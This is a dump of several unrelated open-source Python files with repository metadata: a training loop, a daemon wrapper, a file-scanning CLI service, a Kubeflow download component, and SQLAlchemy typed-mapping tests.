unique_labeled_trainloader = DataLoader(
unique_train_set,
batch_size=args.num_labeled,
drop_last=False)
model = meps_wrapper(model, unique_labeled_trainloader, args)
unlabeled_workers = 4 if args.mu == 1 else 8
train_batches = DataLoader(train_set, batch_size, num_workers=4, shuffle=True, drop_last=True)
unlabeled_batches = DataLoader(unlabeled_set, batch_size*args.mu, num_workers=unlabeled_workers, shuffle=True, drop_last=True)
test_batches = DataLoader(Transform(test_set, device, None), batch_size, num_workers=4, shuffle=False, drop_last=False)
# train_batches = GPUBatches(batch_size=batch_size, transforms=train_transforms, dataset=train_set, shuffle=True, drop_last=True, max_options=200)
# test_batches = GPUBatches(batch_size=batch_size, dataset=test_set, shuffle=False, drop_last=False)
is_bias = group_by_key(('bias' in k, v) for k, v in trainable_params(model).items())
schedules = [
lambda step: lr_schedule((step+1)/len(train_batches))/batch_size,
lambda step: lr_schedule((step+1)/len(train_batches))*(64/batch_size)
]
opts = [
optim.SGD(is_bias[False], lr=schedules[0](0), weight_decay=5e-4*batch_size, momentum=0.9, nesterov=True),
optim.SGD(is_bias[True], lr=schedules[1](0), weight_decay=5e-4*batch_size/64, momentum=0.9, nesterov=True)
]
logs = Table()
ema_model = copy.deepcopy(model)
for epoch in range(1, epochs+1):
train_summary = train(args, device, model, ema_model, train_batches, unlabeled_batches, opts, schedules, loss_func)
train_time = timer()
test_summary = test(device, model, ema_model, test_batches, loss_func, [lambda x: x, flip_lr])
test_time = timer(include_in_total=False)
log = {
"train": union({"time": train_time}, train_summary),
"valid": union({"time": test_time}, test_summary),
"total time": timer.total_time
}
logs.append(union({"epoch": epoch}, log))
with open(os.path.join(os.path.expanduser(args.log_dir), args.file_name), 'w') as f:
f.write(tsv(logs.log))
| 30.657095
| 151
| 0.621412
|
d0d929e3c3c2558e6386a512e5f7335a06f68a7e
| 1,330
|
py
|
Python
|
sb_service/daemons/ScorebotDaemonJava.py
|
isabella232/scorebot
|
71f26a73b04c419ed0ccfbe73575d4b02fa26595
|
[
"Apache-2.0"
] | 63
|
2019-11-22T23:54:21.000Z
|
2020-10-15T16:42:34.000Z
|
sb_service/daemons/ScorebotDaemonJava.py
|
isabella232/scorebot
|
71f26a73b04c419ed0ccfbe73575d4b02fa26595
|
[
"Apache-2.0"
] | null | null | null |
sb_service/daemons/ScorebotDaemonJava.py
|
isabella232/scorebot
|
71f26a73b04c419ed0ccfbe73575d4b02fa26595
|
[
"Apache-2.0"
] | 11
|
2019-11-23T04:41:15.000Z
|
2021-06-10T15:14:21.000Z
|
import logging
from logging import config
import sys
from common.orm_loaded_constants import constants
from sb_service.common import logging_util
from external_tools.daemon.daemonize import Daemon
from sb_service.daemons.ScorebotDaemon import ScorebotDaemon
class ScorebotDaemonJava(Daemon):
"""
The ScorebotDaemon handles maintenance operations for SCORE Bot Rules.
If there is any Github web-hook data (branch pull request) queued that has not been
processed then load them and send for processing.
"""
def __init__(self, pidfile):
super(ScorebotDaemonJava, self).__init__(pidfile=pidfile)
self._daemon_name = "ScorebotDaemonJava"
logging.config.dictConfig(logging_util.get_logging_conf(self._daemon_name, constants.SCOREBOT_DAEMON_JAVA_LOG))
self._logger = logging.getLogger(__name__)
self.ScorebotProcess = ScorebotDaemon("Java", self._logger, self._daemon_name,
constants.SCOREBOT_DAEMON_JAVA_LOG)
def run(self):
self.ScorebotProcess.run()
daemon = ScorebotDaemonJava(constants.SCOREBOT_DAEMON_JAVA_PID)
# Check to see if we're running under the debugger, if we are then bypass the daemonize and just run directly.
if sys.gettrace() is not None:
daemon.run()
else:
daemon.perform_action()
| 38
| 119
| 0.745865
|
c68fa4a0c81c6cb70606a00ba779339ec40f8bae
| 1,122
|
py
|
Python
|
filescan_cli/service/system.py
|
filescanio/fsio-cli
|
5129fbf06dd4a4fbf3a3237d3b7cbe73c9526fa8
|
[
"MIT"
] | null | null | null |
filescan_cli/service/system.py
|
filescanio/fsio-cli
|
5129fbf06dd4a4fbf3a3237d3b7cbe73c9526fa8
|
[
"MIT"
] | 3
|
2022-03-15T08:53:59.000Z
|
2022-03-18T17:52:09.000Z
|
filescan_cli/service/system.py
|
filescanio/fsio-cli
|
5129fbf06dd4a4fbf3a3237d3b7cbe73c9526fa8
|
[
"MIT"
] | 1
|
2022-03-22T23:54:03.000Z
|
2022-03-22T23:54:03.000Z
|
import json
from filescan_cli.core.http import HttpRequests
from filescan_cli.common.utils import run_safe
from filescan_cli.service.endpoints import get_endpoint, SYSTEM_INFO, SYSTEM_CONFIG
from filescan_cli.service.headers import get_public_header
class System:
def __init__(self):
self.http_client = HttpRequests()
self.headers = get_public_header()
async def get_info(self):
endpoint = get_endpoint(SYSTEM_INFO)
result = await run_safe(
self.http_client.get,
endpoint,
headers=self.headers
)
if result['success']:
return { 'content': json.loads(result['content']) }
else:
return { 'error': result['content'] }
async def get_config(self):
endpoint = get_endpoint(SYSTEM_CONFIG)
result = await run_safe(
self.http_client.get,
endpoint,
headers=self.headers
)
if result['success']:
return { 'content': json.loads(result['content']) }
else:
return { 'error': result['content'] }
| 26.093023
| 83
| 0.614082
|
87d290b35813849cd2005248400a76043a428293
| 385
|
py
|
Python
|
python_components/download-file/src/download_file.py
|
ptitzler/kfp-component-tests
|
80b67ec61deb83bf459d69a6f0242b1454fa2d43
|
[
"Apache-2.0"
] | null | null | null |
python_components/download-file/src/download_file.py
|
ptitzler/kfp-component-tests
|
80b67ec61deb83bf459d69a6f0242b1454fa2d43
|
[
"Apache-2.0"
] | null | null | null |
python_components/download-file/src/download_file.py
|
ptitzler/kfp-component-tests
|
80b67ec61deb83bf459d69a6f0242b1454fa2d43
|
[
"Apache-2.0"
] | 1
|
2022-01-20T01:54:46.000Z
|
2022-01-20T01:54:46.000Z
|
import kfp
def download(url, file_content: kfp.components.OutputPath(str)):
import requests
response = requests.get(url=url)
if response.status_code == 200:
with open(file_content, 'wb') as file_content:
file_content.write(response.content)
else:
raise RuntimeError(f'Download of {url} returned HTTP status code {response.status_code}')
| 27.5
| 97
| 0.696104
|
71eb7ce42b11063595e4b6144126e9365eac20eb
| 35,027
|
py
|
Python
|
test/orm/declarative/test_typed_mapping.py
|
petit87/sqlalchemy
|
67d674bd63ca36ac32b23f96e2b19e9dac6b0863
|
[
"MIT"
] | null | null | null |
test/orm/declarative/test_typed_mapping.py
|
petit87/sqlalchemy
|
67d674bd63ca36ac32b23f96e2b19e9dac6b0863
|
[
"MIT"
] | null | null | null |
test/orm/declarative/test_typed_mapping.py
|
petit87/sqlalchemy
|
67d674bd63ca36ac32b23f96e2b19e9dac6b0863
|
[
"MIT"
] | null | null | null |
import dataclasses
import datetime
from decimal import Decimal
from typing import Dict
from typing import Generic
from typing import List
from typing import Optional
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from sqlalchemy import BIGINT
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import exc as sa_exc
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import Numeric
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import VARCHAR
from sqlalchemy.exc import ArgumentError
from sqlalchemy.orm import as_declarative
from sqlalchemy.orm import composite
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import DeclarativeBase
from sqlalchemy.orm import declared_attr
from sqlalchemy.orm import deferred
from sqlalchemy.orm import Mapped
from sqlalchemy.orm import mapped_column
from sqlalchemy.orm import relationship
from sqlalchemy.orm import undefer
from sqlalchemy.orm.collections import attribute_mapped_collection
from sqlalchemy.orm.collections import MappedCollection
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.util.typing import Annotated
class DeclarativeBaseTest(fixtures.TestBase):
def test_class_getitem_as_declarative(self):
T = TypeVar("T", bound="CommonBase") # noqa
class CommonBase(Generic[T]):
@classmethod
def boring(cls: Type[T]) -> Type[T]:
return cls
@classmethod
def more_boring(cls: Type[T]) -> int:
return 27
@as_declarative()
class Base(CommonBase[T]):
foo = 1
class Tab(Base["Tab"]):
__tablename__ = "foo"
a = Column(Integer, primary_key=True)
eq_(Tab.foo, 1)
is_(Tab.__table__, inspect(Tab).local_table)
eq_(Tab.boring(), Tab)
eq_(Tab.more_boring(), 27)
with expect_raises(AttributeError):
Tab.non_existent
class MappedColumnTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
def test_legacy_declarative_base(self):
typ = VARCHAR(50)
Base = declarative_base(type_annotation_map={str: typ})
class MyClass(Base):
__tablename__ = "mytable"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str]
x: Mapped[int]
is_(MyClass.__table__.c.data.type, typ)
is_true(MyClass.__table__.c.id.primary_key)
def test_required_no_arg(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Python typing annotation is required for attribute "
r'"A.data" when primary '
r'argument\(s\) for "MappedColumn" construct are None or '
r"not present",
):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data = mapped_column()
def test_construct_rhs(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id = mapped_column("id", Integer, primary_key=True)
name = mapped_column(String(50))
self.assert_compile(
select(User), "SELECT users.id, users.name FROM users"
)
eq_(User.__mapper__.primary_key, (User.__table__.c.id,))
def test_construct_lhs(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
data: Mapped[Optional[str]] = mapped_column()
self.assert_compile(
select(User), "SELECT users.id, users.name, users.data FROM users"
)
eq_(User.__mapper__.primary_key, (User.__table__.c.id,))
is_false(User.__table__.c.id.nullable)
is_false(User.__table__.c.name.nullable)
is_true(User.__table__.c.data.nullable)
def test_construct_lhs_omit_mapped_column(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str]
data: Mapped[Optional[str]]
x: Mapped[int]
y: Mapped[int]
created_at: Mapped[datetime.datetime]
self.assert_compile(
select(User),
"SELECT users.id, users.name, users.data, users.x, "
"users.y, users.created_at FROM users",
)
eq_(User.__mapper__.primary_key, (User.__table__.c.id,))
is_false(User.__table__.c.id.nullable)
is_false(User.__table__.c.name.nullable)
is_true(User.__table__.c.data.nullable)
assert isinstance(User.__table__.c.created_at.type, DateTime)
def test_construct_lhs_type_missing(self, decl_base):
class MyClass:
pass
with expect_raises_message(
sa_exc.ArgumentError,
"Could not locate SQLAlchemy Core type for Python type: .*MyClass",
):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[MyClass] = mapped_column()
def test_construct_rhs_type_override_lhs(self, decl_base):
class Element(decl_base):
__tablename__ = "element"
id: Mapped[int] = mapped_column(BIGINT, primary_key=True)
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(BIGINT, primary_key=True)
other_id: Mapped[int] = mapped_column(ForeignKey("element.id"))
data: Mapped[int] = mapped_column()
# exact class test
is_(User.__table__.c.id.type.__class__, BIGINT)
is_(User.__table__.c.other_id.type.__class__, BIGINT)
is_(User.__table__.c.data.type.__class__, Integer)
@testing.combinations(True, False, argnames="include_rhs_type")
def test_construct_nullability_overrides(
self, decl_base, include_rhs_type
):
if include_rhs_type:
args = (String,)
else:
args = ()
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
lnnl_rndf: Mapped[str] = mapped_column(*args)
lnnl_rnnl: Mapped[str] = mapped_column(*args, nullable=False)
lnnl_rnl: Mapped[str] = mapped_column(*args, nullable=True)
lnl_rndf: Mapped[Optional[str]] = mapped_column(*args)
lnl_rnnl: Mapped[Optional[str]] = mapped_column(
*args, nullable=False
)
lnl_rnl: Mapped[Optional[str]] = mapped_column(
*args, nullable=True
)
is_false(User.__table__.c.lnnl_rndf.nullable)
is_false(User.__table__.c.lnnl_rnnl.nullable)
is_true(User.__table__.c.lnnl_rnl.nullable)
is_true(User.__table__.c.lnl_rndf.nullable)
is_false(User.__table__.c.lnl_rnnl.nullable)
is_true(User.__table__.c.lnl_rnl.nullable)
def test_fwd_refs(self, decl_base: Type[DeclarativeBase]):
class MyClass(decl_base):
__tablename__ = "my_table"
id: Mapped["int"] = mapped_column(primary_key=True)
data_one: Mapped["str"]
def test_annotated_types_as_keys(self, decl_base: Type[DeclarativeBase]):
"""neat!!!"""
str50 = Annotated[str, 50]
str30 = Annotated[str, 30]
opt_str50 = Optional[str50]
opt_str30 = Optional[str30]
decl_base.registry.update_type_annotation_map(
{str50: String(50), str30: String(30)}
)
class MyClass(decl_base):
__tablename__ = "my_table"
id: Mapped[str50] = mapped_column(primary_key=True)
data_one: Mapped[str30]
data_two: Mapped[opt_str30]
data_three: Mapped[str50]
data_four: Mapped[opt_str50]
data_five: Mapped[str]
data_six: Mapped[Optional[str]]
eq_(MyClass.__table__.c.data_one.type.length, 30)
is_false(MyClass.__table__.c.data_one.nullable)
eq_(MyClass.__table__.c.data_two.type.length, 30)
is_true(MyClass.__table__.c.data_two.nullable)
eq_(MyClass.__table__.c.data_three.type.length, 50)
def test_unions(self):
our_type = Numeric(10, 2)
class Base(DeclarativeBase):
type_annotation_map = {Union[float, Decimal]: our_type}
class User(Base):
__tablename__ = "users"
__table__: Table
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[Union[float, Decimal]] = mapped_column()
reverse_data: Mapped[Union[Decimal, float]] = mapped_column()
optional_data: Mapped[
Optional[Union[float, Decimal]]
] = mapped_column()
# use Optional directly
reverse_optional_data: Mapped[
Optional[Union[Decimal, float]]
] = mapped_column()
# use Union with None, same as Optional but presents differently
# (Optional object with __origin__ Union vs. Union)
reverse_u_optional_data: Mapped[
Union[Decimal, float, None]
] = mapped_column()
float_data: Mapped[float] = mapped_column()
decimal_data: Mapped[Decimal] = mapped_column()
is_(User.__table__.c.data.type, our_type)
is_false(User.__table__.c.data.nullable)
is_(User.__table__.c.reverse_data.type, our_type)
is_(User.__table__.c.optional_data.type, our_type)
is_true(User.__table__.c.optional_data.nullable)
is_(User.__table__.c.reverse_optional_data.type, our_type)
is_(User.__table__.c.reverse_u_optional_data.type, our_type)
is_true(User.__table__.c.reverse_optional_data.nullable)
is_true(User.__table__.c.reverse_u_optional_data.nullable)
is_(User.__table__.c.float_data.type, our_type)
is_(User.__table__.c.decimal_data.type, our_type)
def test_missing_mapped_lhs(self, decl_base):
with expect_raises_message(
ArgumentError,
r'Type annotation for "User.name" should use the '
r'syntax "Mapped\[str\]" or "MappedColumn\[str\]"',
):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: str = mapped_column() # type: ignore
def test_construct_lhs_separate_name(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
data: Mapped[Optional[str]] = mapped_column("the_data")
self.assert_compile(
select(User.data), "SELECT users.the_data FROM users"
)
is_true(User.__table__.c.the_data.nullable)
def test_construct_works_in_expr(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
class Address(decl_base):
__tablename__ = "addresses"
id: Mapped[int] = mapped_column(primary_key=True)
user_id: Mapped[int] = mapped_column(ForeignKey("users.id"))
user = relationship(User, primaryjoin=user_id == User.id)
self.assert_compile(
select(Address.user_id, User.id).join(Address.user),
"SELECT addresses.user_id, users.id FROM addresses "
"JOIN users ON addresses.user_id = users.id",
)
def test_construct_works_as_polymorphic_on(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
type: Mapped[str] = mapped_column()
__mapper_args__ = {"polymorphic_on": type}
decl_base.registry.configure()
is_(User.__table__.c.type, User.__mapper__.polymorphic_on)
def test_construct_works_as_version_id_col(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
version_id: Mapped[int] = mapped_column()
__mapper_args__ = {"version_id_col": version_id}
decl_base.registry.configure()
is_(User.__table__.c.version_id, User.__mapper__.version_id_col)
def test_construct_works_in_deferred(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = deferred(mapped_column())
self.assert_compile(select(User), "SELECT users.id FROM users")
self.assert_compile(
select(User).options(undefer(User.data)),
"SELECT users.data, users.id FROM users",
)
def test_deferred_kw(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column(deferred=True)
self.assert_compile(select(User), "SELECT users.id FROM users")
self.assert_compile(
select(User).options(undefer(User.data)),
"SELECT users.data, users.id FROM users",
)
class MixinTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
def test_mapped_column_omit_fn(self, decl_base):
class MixinOne:
name: Mapped[str]
x: Mapped[int]
y: Mapped[int] = mapped_column()
class A(MixinOne, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
# ordering of cols is TODO
eq_(A.__table__.c.keys(), ["id", "y", "name", "x"])
def test_mc_duplication_plain(self, decl_base):
class MixinOne:
name: Mapped[str] = mapped_column()
class A(MixinOne, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
class B(MixinOne, decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
is_not(A.__table__.c.name, B.__table__.c.name)
def test_mc_duplication_declared_attr(self, decl_base):
class MixinOne:
@declared_attr
def name(cls) -> Mapped[str]:
return mapped_column()
class A(MixinOne, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
class B(MixinOne, decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
is_not(A.__table__.c.name, B.__table__.c.name)
def test_relationship_requires_declared_attr(self, decl_base):
class Related(decl_base):
__tablename__ = "related"
id: Mapped[int] = mapped_column(primary_key=True)
class HasRelated:
related_id: Mapped[int] = mapped_column(ForeignKey(Related.id))
related: Mapped[Related] = relationship()
with expect_raises_message(
sa_exc.InvalidRequestError,
r"Mapper properties \(i.e. deferred,column_property\(\), "
r"relationship\(\), etc.\) must be declared",
):
class A(HasRelated, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
def test_relationship_duplication_declared_attr(self, decl_base):
class Related(decl_base):
__tablename__ = "related"
id: Mapped[int] = mapped_column(primary_key=True)
class HasRelated:
related_id: Mapped[int] = mapped_column(ForeignKey(Related.id))
@declared_attr
def related(cls) -> Mapped[Related]:
return relationship()
class A(HasRelated, decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
class B(HasRelated, decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
self.assert_compile(
select(A).join(A.related),
"SELECT a.id, a.related_id FROM a "
"JOIN related ON related.id = a.related_id",
)
self.assert_compile(
select(B).join(B.related),
"SELECT b.id, b.related_id FROM b "
"JOIN related ON related.id = b.related_id",
)
class RelationshipLHSTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
@testing.fixture
def decl_base(self):
class Base(DeclarativeBase):
pass
yield Base
Base.registry.dispose()
def test_no_typing_in_rhs(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
bs = relationship("List['B']")
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
with expect_raises_message(
sa_exc.InvalidRequestError,
r"When initializing mapper Mapper\[A\(a\)\], expression "
r'"relationship\(\"List\[\'B\'\]\"\)\" seems to be using a '
r"generic class as the argument to relationship\(\); please "
r"state the generic argument using an annotation, e.g. "
r'"bs: Mapped\[List\[\'B\'\]\] = relationship\(\)"',
):
decl_base.registry.configure()
def test_required_no_arg(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Python typing annotation is required for attribute "
r'"A.bs" when primary '
r'argument\(s\) for "Relationship" construct are None or '
r"not present",
):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
bs = relationship()
def test_rudimentary_dataclasses_support(self, registry):
@registry.mapped
@dataclasses.dataclass
class A:
__tablename__ = "a"
__sa_dataclass_metadata_key__ = "sa"
id: Mapped[int] = mapped_column(primary_key=True)
bs: List["B"] = dataclasses.field( # noqa: F821
default_factory=list, metadata={"sa": relationship()}
)
@registry.mapped
@dataclasses.dataclass
class B:
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
a_id = mapped_column(ForeignKey("a.id"))
self.assert_compile(
select(A).join(A.bs), "SELECT a.id FROM a JOIN b ON a.id = b.a_id"
)
def test_basic_bidirectional(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs: Mapped[List["B"]] = relationship( # noqa F821
back_populates="a"
)
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
a: Mapped["A"] = relationship(
back_populates="bs", primaryjoin=a_id == A.id
)
a1 = A(data="data")
b1 = B()
a1.bs.append(b1)
is_(a1, b1.a)
def test_wrong_annotation_type_one(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Type annotation for \"A.data\" should use the "
r"syntax \"Mapped\['B'\]\" or \"Relationship\['B'\]\"",
):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: "B" = relationship() # type: ignore # noqa
def test_wrong_annotation_type_two(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Type annotation for \"A.data\" should use the "
r"syntax \"Mapped\[B\]\" or \"Relationship\[B\]\"",
):
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: B = relationship() # type: ignore # noqa
def test_wrong_annotation_type_three(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Type annotation for \"A.data\" should use the "
r"syntax \"Mapped\['List\[B\]'\]\" or "
r"\"Relationship\['List\[B\]'\]\"",
):
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(primary_key=True)
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: "List[B]" = relationship() # type: ignore # noqa
def test_collection_class_uselist(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs_list: Mapped[List["B"]] = relationship( # noqa F821
viewonly=True
)
bs_set: Mapped[Set["B"]] = relationship(viewonly=True) # noqa F821
bs_list_warg: Mapped[List["B"]] = relationship( # noqa F821
"B", viewonly=True
)
bs_set_warg: Mapped[Set["B"]] = relationship( # noqa F821
"B", viewonly=True
)
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
a: Mapped["A"] = relationship(viewonly=True)
a_warg: Mapped["A"] = relationship("A", viewonly=True)
is_(A.__mapper__.attrs["bs_list"].collection_class, list)
is_(A.__mapper__.attrs["bs_set"].collection_class, set)
is_(A.__mapper__.attrs["bs_list_warg"].collection_class, list)
is_(A.__mapper__.attrs["bs_set_warg"].collection_class, set)
is_true(A.__mapper__.attrs["bs_list"].uselist)
is_true(A.__mapper__.attrs["bs_set"].uselist)
is_true(A.__mapper__.attrs["bs_list_warg"].uselist)
is_true(A.__mapper__.attrs["bs_set_warg"].uselist)
is_false(B.__mapper__.attrs["a"].uselist)
is_false(B.__mapper__.attrs["a_warg"].uselist)
def test_collection_class_dict_no_collection(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs: Mapped[Dict[str, "B"]] = relationship() # noqa F821
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
name: Mapped[str] = mapped_column()
# this is the old collections message. it's not great, but at the
# moment I like that this is what's raised
with expect_raises_message(
sa_exc.ArgumentError,
"Type InstrumentedDict must elect an appender",
):
decl_base.registry.configure()
def test_collection_class_dict_attr_mapped_collection(self, decl_base):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column()
bs: Mapped[MappedCollection[str, "B"]] = relationship( # noqa F821
collection_class=attribute_mapped_collection("name")
)
class B(decl_base):
__tablename__ = "b"
id: Mapped[int] = mapped_column(Integer, primary_key=True)
a_id: Mapped[int] = mapped_column(ForeignKey("a.id"))
name: Mapped[str] = mapped_column()
decl_base.registry.configure()
a1 = A()
b1 = B(name="foo")
# collection appender on MappedCollection
a1.bs.set(b1)
is_(a1.bs["foo"], b1)
class CompositeTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
@testing.fixture
def dataclass_point_fixture(self, decl_base):
@dataclasses.dataclass
class Point:
x: int
y: int
class Edge(decl_base):
__tablename__ = "edge"
id: Mapped[int] = mapped_column(primary_key=True)
graph_id: Mapped[int] = mapped_column(ForeignKey("graph.id"))
start: Mapped[Point] = composite(
Point, mapped_column("x1"), mapped_column("y1")
)
end: Mapped[Point] = composite(
Point, mapped_column("x2"), mapped_column("y2")
)
class Graph(decl_base):
__tablename__ = "graph"
id: Mapped[int] = mapped_column(primary_key=True)
edges: Mapped[List[Edge]] = relationship()
decl_base.metadata.create_all(testing.db)
return Point, Graph, Edge
def test_composite_setup(self, dataclass_point_fixture):
Point, Graph, Edge = dataclass_point_fixture
with fixture_session() as sess:
sess.add(
Graph(
edges=[
Edge(start=Point(1, 2), end=Point(3, 4)),
Edge(start=Point(7, 8), end=Point(5, 6)),
]
)
)
sess.commit()
self.assert_compile(
select(Edge),
"SELECT edge.id, edge.graph_id, edge.x1, edge.y1, "
"edge.x2, edge.y2 FROM edge",
)
with fixture_session() as sess:
g1 = sess.scalar(select(Graph))
# round trip!
eq_(g1.edges[0].end, Point(3, 4))
def test_named_setup(self, decl_base: Type[DeclarativeBase]):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped[Address] = composite(
Address, mapped_column(), mapped_column(), mapped_column("zip")
)
decl_base.metadata.create_all(testing.db)
with fixture_session() as sess:
sess.add(
User(
name="user 1",
address=Address("123 anywhere street", "NY", "12345"),
)
)
sess.commit()
with fixture_session() as sess:
u1 = sess.scalar(select(User))
# round trip!
eq_(u1.address, Address("123 anywhere street", "NY", "12345"))
def test_no_fwd_ref_annotated_setup(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
with expect_raises_message(
ArgumentError,
r"Can't use forward ref ForwardRef\('Address'\) "
r"for composite class argument",
):
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped["Address"] = composite(
mapped_column(), mapped_column(), mapped_column("zip")
)
def test_fwd_ref_plus_no_mapped(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
with expect_raises_message(
ArgumentError,
r"Type annotation for \"User.address\" should use the syntax "
r"\"Mapped\['Address'\]\" or \"MappedColumn\['Address'\]\"",
):
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: "Address" = composite( # type: ignore
mapped_column(), mapped_column(), mapped_column("zip")
)
def test_fwd_ref_ok_explicit_cls(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped["Address"] = composite(
Address, mapped_column(), mapped_column(), mapped_column("zip")
)
self.assert_compile(
select(User),
'SELECT "user".id, "user".name, "user".street, '
'"user".state, "user".zip FROM "user"',
)
def test_cls_annotated_setup(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
state: str
zip_: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped[Address] = composite(
mapped_column(), mapped_column(), mapped_column("zip")
)
decl_base.metadata.create_all(testing.db)
with fixture_session() as sess:
sess.add(
User(
name="user 1",
address=Address("123 anywhere street", "NY", "12345"),
)
)
sess.commit()
with fixture_session() as sess:
u1 = sess.scalar(select(User))
# round trip!
eq_(u1.address, Address("123 anywhere street", "NY", "12345"))
def test_one_col_setup(self, decl_base):
@dataclasses.dataclass
class Address:
street: str
class User(decl_base):
__tablename__ = "user"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
address: Mapped[Address] = composite(Address, mapped_column())
decl_base.metadata.create_all(testing.db)
with fixture_session() as sess:
sess.add(
User(
name="user 1",
address=Address("123 anywhere street"),
)
)
sess.commit()
with fixture_session() as sess:
u1 = sess.scalar(select(User))
# round trip!
eq_(u1.address, Address("123 anywhere street"))
class AllYourFavoriteHitsTest(fixtures.TestBase, testing.AssertsCompiledSQL):
"""try a bunch of common mappings using the new style"""
